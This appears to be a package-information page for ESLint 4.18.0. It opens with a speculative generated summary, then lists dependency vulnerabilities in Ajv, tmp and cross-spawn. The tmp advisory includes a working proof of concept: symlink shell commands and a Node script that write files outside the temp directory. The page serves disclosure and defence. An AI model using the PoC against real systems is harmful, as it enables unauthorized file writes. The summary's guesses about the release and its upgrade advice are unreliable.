ESLint version 4.18.0 is a minor release following 4.17.0 of this popular JavaScript linting tool, designed to identify and report on problematic patterns found in ECMAScript/JavaScript code. Both versions share the same core functionality as AST-based pattern checkers, ensuring code quality and consistency. Examining the dependency lists reveals no immediate, externally visible changes in core dependencies between these versions, meaning the underlying linting rulesets and parsing capabilities remain largely consistent. However, under the hood, it's highly probable that bug fixes and performance improvements were implemented.
Critically, the dist object provides insight into the release: 4.18.0 features a fileCount of 356 and an unpackedSize of 2434242, data not present in 4.17.0's data. This suggests internal structural changes, potentially focused on optimizing the package's footprint. The publication date is also key: version 4.18.0 was released roughly two weeks after 4.17.0, indicating a rapid cycle of development and refinement. While the absence of specific changelogs prevents detailed analysis, developers should update to 4.18.0 expecting incremental improvements to stability, runtime efficiency, and potentially, nuanced rule enhancements. If any breaking changes or major new configurations were introduced, they would be described in the specific release notes that are recommended to read before upgrading. Therefore, unless explicitly contraindicated by specific project requirements, upgrading presents a low-risk opportunity to leverage the latest refinements from the ESLint team.
All the vulnerabilities related to the version 4.18.0 of the package
Prototype Pollution in Ajv
An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)
tmp allows arbitrary temporary file / directory write via symbolic link dir parameter
tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible.
Tested on a Linux machine.
tmpDir that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1 (outside the tmpDir):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.